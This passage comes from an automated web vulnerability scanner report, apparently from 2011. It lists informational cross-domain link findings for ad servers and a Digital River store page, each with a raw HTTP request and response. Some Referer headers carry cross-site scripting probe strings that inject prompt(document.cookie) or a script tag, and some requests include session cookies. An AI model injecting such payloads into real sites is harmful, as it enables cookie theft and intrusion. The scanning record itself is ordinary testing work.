Date: Sun, 04 Sep 2011 12:13:43 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
78/3/0/%2a/u%3B243212063%3B0-0%3B1%3B70077431%3B3454-728/90%3B43061369/43079156/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://resources.computerworld.com/show/200004410/00358030042303CTWJ1RE6JIEIR/"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/3268888/PID_1674894_Collapsed_Content.jpg" width="728" height="90" BORDER=0 alt= "'+ altImgAltText +'"/></A>
...[SNIP]...

15.6. http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.cpw.security/cybercrimehacking/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/;cid=18810;kw=cybercrime_and_hacking,internet,privacy,security,security_hardware_%26_software,breach,cybercrime,hack,hacker_rankings,hackers,hacking,internet,rankmyhack;author=darlene_storm;page_type=blog;blog_name=security_is_sexy;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;compsz=undefined;indust=undefined;empcnt=;referrer=google;insiderauth=no;ord=5992585949134082?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2685217/DEMOf11_300x250_Innov.gif

Request

GET /adj/idge.cpw.security/cybercrimehacking/;cid=18810;kw=cybercrime_and_hacking,internet,privacy,security,security_hardware_%26_software,breach,cybercrime,hack,hacker_rankings,hackers,hacking,internet,rankmyhack;author=darlene_storm;page_type=blog;blog_name=security_is_sexy;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;compsz=undefined;indust=undefined;empcnt=;referrer=google;insiderauth=no;ord=5992585949134082? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 329
Date: Sun, 04 Sep 2011 12:13:53 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/w;243898845;1-0;2;70077431;4307-300/250;43191783/43209570/1;;~aopt=2/0/25/0;~sscs=%3fhttp://www.demo.com/DF11IDGAD1"><img src="http://s0.2mdn.net/viewad/2685217/DEMOf11_300x250_Innov.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.7. http://ad.doubleclick.net/adj/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.nww.home/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.nww.home/;pos=dogear;sz=1x1;tile=5;dcopt=ist;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=6244661847718764?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/idge.nww.home/;pos=dogear;sz=1x1;tile=5;dcopt=ist;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=6244661847718764? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1268
Date: Sun, 04 Sep 2011 14:46:23 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/w;44306;0-0;0;43070067;31-1/1;0/0/0;;~aopt=2/0/25/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.8. http://ad.doubleclick.net/adj/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.nww.home/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.nww.home/;pos=microguide;sz=150x35;tile=8;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=6244661847718764?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2646892/logo_vmware_new.gif

Request

GET /adj/idge.nww.home/;pos=microguide;sz=150x35;tile=8;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=6244661847718764? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 341
Date: Sun, 04 Sep 2011 14:46:35 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/d;243781040;0-0;0;43070067;189-150/35;43145060/43162847/1;;~aopt=2/0/25/0;~sscs=%3fhttp://ad.doubleclick.net/clk;243562205;67273007;a"><img src="http://s0.2mdn.net/viewad/2646892/logo_vmware_new.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.9. http://ad.doubleclick.net/adj/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.nww.home/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.nww.home/;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,970x30,950x55,972x100;tile=3;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=6244661847718764?

The response contains the following link to another domain:

http://s0.2mdn.net/2547967/PID_1586249_content_reel.jpg

Request

GET /adj/idge.nww.home/;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,970x30,950x55,972x100;tile=3;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=6244661847718764? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 51630
Date: Sun, 04 Sep 2011 14:46:33 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
78/3/0/%2a/o%3B237455174%3B0-0%3B0%3B43070067%3B39375-950/55%3B41621755/41639542/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://resources.networkworld.com/show/200002825/00193840033841NWW29UML0ULRS/"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/2547967/PID_1586249_content_reel.jpg" width="950" height="55" BORDER=0 alt=""/></A>
...[SNIP]...

15.10. http://ad.doubleclick.net/adj/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.nww.home/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.nww.home/;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=2665094938021218.5?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2685217/BIA11_336x280.jpg

Request

GET /adj/idge.nww.home/;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=2665094938021218.5? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 327
Date: Sun, 04 Sep 2011 14:47:01 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/f;243756202;0-0;2;43070067;4252-336/280;43111299/43129086/1;;~aopt=2/0/25/0;~sscs=%3fhttp://www.biperspectives.com/banner"><img src="http://s0.2mdn.net/viewad/2685217/BIA11_336x280.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.11. http://ad.doubleclick.net/adj/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.nww.home/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.nww.home/;pos=topleaderboard;sz=728x90,950x98,972x125,970x98,970x268;tile=1;dcopt=ist;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=2665094938021218.5?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2898059/Coyote_728X90.gif

Request

GET /adj/idge.nww.home/;pos=topleaderboard;sz=728x90,950x98,972x125,970x98,970x268;tile=1;dcopt=ist;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=2665094938021218.5? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 317
Date: Sun, 04 Sep 2011 14:46:53 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/r;245010754;0-0;1;43070067;3454-728/90;43588539/43606326/1;;~aopt=2/0/25/0;~sscs=%3fhttp://www.coyotepoint.com/"><img src="http://s0.2mdn.net/viewad/2898059/Coyote_728X90.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.12. http://ad.doubleclick.net/adj/ssec/TIPS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ssec/TIPS

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ssec/TIPS;pos=0;pth=tip.Addressing-the-dangers-of-JavaScript-in-the-enterprise;sz=300x600;ptile=4;gci=2240040538;tax=299972;clu=2240031136;ord=41027553

The response contains the following link to another domain:

http://s0.2mdn.net/978797/PID_1701895_banner_backup.png

Request

GET /adj/ssec/TIPS;pos=0;pth=tip.Addressing-the-dangers-of-JavaScript-in-the-enterprise;sz=300x600;ptile=4;gci=2240040538;tax=299972;clu=2240031136;ord=41027553 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 53190
Date: Sun, 04 Sep 2011 12:13:37 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
32284%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/n%3B245594595%3B5-0%3B0%3B20649760%3B4986-300/600%3B43484657/43502444/1%3B%3B%7Esscs%3D%3fhttp://"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/978797/PID_1701895_banner_backup.png" width="300" height="600" BORDER=0 alt= "'+ altImgAltText +'"/></A>
...[SNIP]...

15.13. http://ad.doubleclick.net/adj/ssec/TIPS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ssec/TIPS

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ssec/TIPS;pos=0;pth=tip.Addressing-the-dangers-of-JavaScript-in-the-enterprise;sz=2x1;ptile=6;dcopt=ist;gci=2240040538;tax=299972;clu=2240031136;ord=41027553

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/ssec/TIPS;pos=0;pth=tip.Addressing-the-dangers-of-JavaScript-in-the-enterprise;sz=2x1;ptile=6;dcopt=ist;gci=2240040538;tax=299972;clu=2240031136;ord=41027553 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 242
Date: Sun, 04 Sep 2011 12:13:44 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/e;44306;0-0;0;20649760;926-2/1;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.14. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

http://ads.pointroll.com/PortalServe/?pid=1360197W60220110720201540&flash=10&time=0|9:14|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBRr5MnodjTqmsIYHyjAT7k9CZAsagjuMClpzB0TG2yYHPfwAQARgBIL7O5Q04AFD-h9aS-f____8BYMnW-obIo6AZugEJNzI4eDkwX2FzyAEJ2gGWAWZpbGU6Ly8vRDovY2RuLzIwMTEvMDkvMDQvZ2hkYi9kb3JrLXJlZmxlY3RlZC14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctY3dlNzktY2FwZWM4Ni1qYXZhc2NyaXB0LWluamVjdGlvbi1leGFtcGxlLXBvYy1yZXBvcnQtc3RvcmVkaWdpdGFscml2ZXJjb20uaHRtbJgC-gG4AhjAAgbIAu712ySoAwHoA6gG6APdBfUDAgAAxKAGEQ%26num%3D1%26sig%3DAOD64_0LWfxq5dnWNkTLINvN8Jq7FKlUcQ%26client%3Dca-pub-4063878933780912%26adurl%3D$CTURL$&r=0.838781330967322

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 14:17:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 18178
Set-Cookie:PRvt=CBJ9xErB5A2iNjAcUBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=1EAC0400-DA40-6323-0309-F71007140101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKcV*1774:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKcVAA2c:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Fhqf:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GSur:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FhqfGSur:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
F71007140101' onMouseOver=\"if(typeof(prRoll)=='function')prBOver('1EAC0400DA4063230309F71007140101');\" onMouseOut=\"if(typeof(prRoll)=='function')prBOut(event);\" style='position:absolute;z-index:1'><object id='prfls1EAC0400DA4063230309F71007140101' name='prfls1EAC0400DA4063230309F71007140101' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0 width='728' height='90' style='width:728px;height:90px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/Ford/884254/Shell_728x90.swf?PRCampID=40817&PRPubID=ggle&PRAdSize=728x90&PRFormat=EX&PRAd=1502685&PRCID=1502685&PRplcmt=136
...[SNIP]...

15.15. http://amch.questionmarket.com/adscgen/d_layer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The page was loaded from a URL containing a query string:

http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=2

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=2 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1; LP=1315138435

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:11 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Content-Type: text/html
Content-Length: 12125

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
_InsertSwf() {
   if (DL_FlashInstalled()) {    // Make sure the browser can handle Flash.
       // Inside the DIV tag: the object. Outside: nothing; Flash handles its own click events.
       DL_InsertObject('', '<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=3,0,0,0" WIDTH="'+DL_ImgWidth+'" HEIGHT="'+DL_ImgHeight+'" id="DL_object"><PARAM NAME=movie VALUE="http://amch.questionmarket.com/static/1000_engadgetgray_li-350x250-1l-eng-nul.swf?clickTag=JAVASCRIPT:DL_GotoSurvey();&clickTag2=JAVASCRIPT:DL_Close();">
...[SNIP]...

15.16. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99007242

The response contains the following link to another domain:

https://www.googleadservices.com/pagead/conversion/1030885431/?label=67XDCNeM1gEQt6DI6wM&guid=ON&script=0

Request

GET /?pixid=99007242 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: https://www.googleadservices.com/pagead/conversion/1030885431/?label=67XDCNeM1gEQt6DI6wM&guid=ON&script=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 271
Date: Sun, 04 Sep 2011 12:18:44 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="https://www.googleadservices.com/pagead/conversion/1030885431/?label=67XDCNeM1gEQt6DI6wM&amp;guid=ON&amp;script=0">here</a>
...[SNIP]...

15.17. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=netmng&vid=y9dly9jlztlwn

The response contains the following link to another domain:

http://gcm.netmng.com/?id=CAESEFJFNlr3slpardIUWNoYbcQ&cver=1&vid=y9dly9jlztlwn

Request

GET /pixel?nid=netmng&vid=y9dly9jlztlwn HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://gcm.netmng.com/?id=CAESEFJFNlr3slpardIUWNoYbcQ&cver=1&vid=y9dly9jlztlwn
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 12:26:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://gcm.netmng.com/?id=CAESEFJFNlr3slpardIUWNoYbcQ&cver=1&vid=y9dly9jlztlwn">here</A>
...[SNIP]...

15.18. http://corporate.digitalriver.com/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store

Issue detail

The page was loaded from a URL containing a query string:

http://corporate.digitalriver.com/store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0

The response contains the following links to other domains:

http://phx.corporate-ir.net/phoenix.zhtml?c=94762&p=irol-irhome
http://t2.trackalyzer.com/trackalyze.js
http://www.twitter.com/digitalriverinc
https://cm.commerce5.com/
https://cp.element5.com/

Request

GET /store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0 HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145926231; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; fcC=X=C708273219&Y=1315145926358&FV=10&H=1315145926231&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293

Response

15.19. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/html/pbPage.Homepage

Issue detail

The page was loaded from a URL containing a query string:

http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740

The response contains the following links to other domains:

